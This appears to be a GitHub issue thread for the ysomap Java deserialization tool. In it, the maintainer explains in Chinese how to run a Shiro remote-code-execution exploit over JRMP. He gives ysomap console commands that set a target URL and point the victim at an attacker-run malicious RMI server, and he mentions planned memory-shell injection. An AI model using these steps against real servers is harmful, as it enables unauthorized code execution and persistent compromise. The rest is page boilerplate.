Comments (3)
wh1t3p1g
commented on June 22, 2024
当前的shiro rce还有点问题,我最近再改改,具体的使用可以看https://github.com/wh1t3p1g/ysomap/blob/master/scripts/shiro_rce.yso,
跟问题 #15 差不多,到时候,我写一点介绍,您可以先看这个脚本。
from ysomap.
wh1t3p1g
commented on June 22, 2024
你好,
关于你提的问题:
- shiro+jrmp
use exploit ShiroRCE1
set target http://localhost:8080/
set requestMethod GET
use payload RMIConnectWithUnicastRemoteObject
use bullet RMIConnectBullet
set rhost rmi_server_ip
set rport rmi_server_port
run
另外需要建立一个RMI的恶意服务,如RMIListener或RMIRefListener
此处的话,其实不需要依赖cb或cc
- 关于注入内存马的问题
当前关于内存马的支持,将在下个版本中更新支持(暂时有的tomcatEcho不适合应用于shiro)。
预计采用形式为exploit(ShiroRCE1) payload(cb1) bullet(TemplatesImplBullet)
from ysomap.
sv3nbeast
commented on June 22, 2024
欧克,感谢
from ysomap.
Related Issues (12)
- CommonsBeanutils1生成ser后要怎么使用? HOT 8
- 生成序列化文件失败 HOT 1
- 可以在 Release 里面提供一个编译好的 jar 包吗😂 HOT 1
- ReflectionHelper.newInstance应用面较小 HOT 1
- show options exception HOT 1
- infinite loop when run explot HOT 1
- 请问一下,如何对fastjson注入一个内存马
- 请问一下如何HashMap通过反射修改put方法,put进去的key HOT 3
- 报错 HOT 3
- Hessian XString deserialisation stack trace HOT 6
- 新功能建议 HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysomap.